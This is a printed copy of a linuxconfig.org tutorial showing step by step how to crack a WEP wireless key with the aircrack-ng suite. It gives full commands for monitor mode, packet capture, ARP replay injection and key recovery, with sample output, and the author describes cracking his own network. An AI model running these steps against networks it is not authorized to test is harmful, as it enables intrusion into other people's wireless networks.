How to Crack a Wireless WEP Key Using AIR Crack

Submit Your Config Contact us

Ubuntu Linux Forumwww.daniweb.com

Free community help & discussion Engage with expert techies

Contents [Hide]

AIR Crack installation

Identify wireless network interface

Turn on Monitor mode

Identify a wireless network BSSID

Sniffing wireless network

Injection of packets

Crack WEP wireless key

This article shortly describes simple steps on how to crack a wireless

WEP key using AIR Crack software. This can be done by sniffing a

wireless network, capturing encrypted packets and running appropriate

encryption cracking program in attempt to decrypt captured data. WEP (

Wired Equivalent Privacy ) is quite easy to crack as it uses only one key

to encrypt all traffic. Basic principle is that communication between two

nodes on the network is based on the MAC address. Each host receives

packets only intended for MAC address of its own interface. The same

principle also applies for a wireless networks. However, if one node sets

its own network card into promiscuous mode it will also receive packets

which are not addressed for its own MAC address.

To crack the WEP key a hacker needs to capture sample packets not intended for his own network interface

and run crack program to compare testing keys against WEP key bundled with captured packets in attempt

of decryption. The key which fits to decrypt captured packets is the key used by wireless network to encrypt

its entire wireless communication with its connected stations.

The guide assumes that your have wireless network card installed and that it supports monitor mode. In this

example I'm using Realtek Semiconductor Co., Ltd. RTL-8185 IEEE 802.11a/b/g Wireless LAN Controller.

Debian:

# apt-get install aircrack-ng

Fedora:

# yum -y install aircrack-ng

How to crack a wireless WEP key using AIR Crack http://linuxconfig.org/how-to-crack-a-wireless-wep-key-using-air-crack

1 of 7 16-Jan-14 10:10 AM

Homepage:

aircrack-ng.org

First we need to identify name of our wireless network interface. If your wireless network card is installed

correctly an iwconfig command will reveal the name of your wireless network interface:

$ /sbin/iwconfig

wlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

# airmon-ng start wlan0

Interface Chipset Driver

wlan0 rtl8180 - [phy0]

(monitor mode enabled on mon0)

In this guide i'm are going to crack a wireless WEP key of my own network. In this step I need to identify

BSSID of the network I'm intending to crack and as well as its channel number:

# airodump-ng wlan0

Information we can retrieve from airodump-ng output:

BASE:

BSSID : 00:11:95:9F:FD:F4

Channel: 6

STATION:

MAC: 00:13:02:30:FF:EC

Station connected to my wireless router is my laptop with wireless network card running Debian lenny. It is

important to have at least one station associated with base so we can capture packets from this

communication.


2 of 7 16-Jan-14 10:10 AM

At this stage we can start capturing packets between base and station. The following command will start

capturing packets. It is recommended to capture at least 5000 packets. Number of packets required depends

on WEP key length in use. I have managed to crack WEP key 64 bits long with 10 hex characters with

around 6000 captured packets. Number 6 in the following command is a channel number of our wireless

base station.

# airodump-ng -c 6 -w data-capture wlan0

Capturing the packets may take some. aireplay-ng will create some traffic so we can capture more packets

for a given time. Since we are hacking our own network, browsing internet on my laptop also helps to create

some traffic.

# aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC wlan0

As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets

are now stored in data-capture-01.cap file.

NOTE: do not stop capturing process as you do not know if current amount of captured packed is

satisfactory to crack WEP key.

# aircrack-ng -z data-capture-01.cap

Opening data-capture-01.cap


3 of 7 16-Jan-14 10:10 AM

Read 450 packets.

# BSSID ESSID Encryption

1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs)

2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)

Index number of target network ?

1

Aircrack-ng 1.0 rc1

[00:00:13] Tested 485 keys (got 16690 IVs)

KB depth byte(vote)

0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)

1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)

2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)

3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)

4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

KEY FOUND! [ 3F:F3:8E:6E:98 ]

Decrypted correctly: 100%

Download Softwarewww.mobogenie.com/Android-Manager

Download Free PC Manager Software for Android Devices, Download Now !


4 of 7 16-Jan-14 10:10 AM

Loading...

Post your job here

Provided by LinuxCareer.com


5 of 7 16-Jan-14 10:10 AM

Lubos.Rendek.org

Tuxmachines.org

Linuxscrew.com

Suggest Website !

Find the job that's right for you !

Linux professionals on any

experience level can now find

Our IT Skills Watch page reflects

an up to date IT skills demand

leaning towards the Linux and

Learn to run Linux servers and

prepare for LPI certification with

Linux Academy . 104 available


6 of 7 16-Jan-14 10:10 AM

Linux Job Search Submit Your Config Contact us Donate

Linux Career - Member Site

Copyright 2007 - 2014 LinuxConfig.com. All rights reserved.

latest employment opportunities

on our Linux Jobs page.

Unix environment. We have

considered a number of skills and

operating systems.

See the result...

video lessons with PDF course

notes with your own server!


7 of 7 16-Jan-14 10:10 AM

How to Crack a Wireless WEP Key Using AIR Crack

Documents

Transcript of How to Crack a Wireless WEP Key Using AIR Crack